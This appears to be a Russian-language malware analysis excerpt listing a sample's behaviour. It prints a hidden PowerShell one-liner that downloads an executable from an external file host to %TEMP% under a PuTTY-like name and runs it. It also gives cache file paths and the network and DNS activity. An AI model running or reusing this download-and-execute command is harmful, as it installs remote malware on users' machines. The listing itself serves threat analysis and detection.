Техническая информация
- https://a.pomf.cat/dfqpqh.exe как %temp%\puttyx8vv6.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dfqpqh.exe','%TEMP%\puttyx8vv6.exe'); Start-Process('%TEMP%\puttyx8vv6.exe')
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dfqpqh.exe','%TEMP%\puttyx8vv6.exe'); Start-Process('%TEMP%\puttyx8vv6.exe')' (со скрытым окном)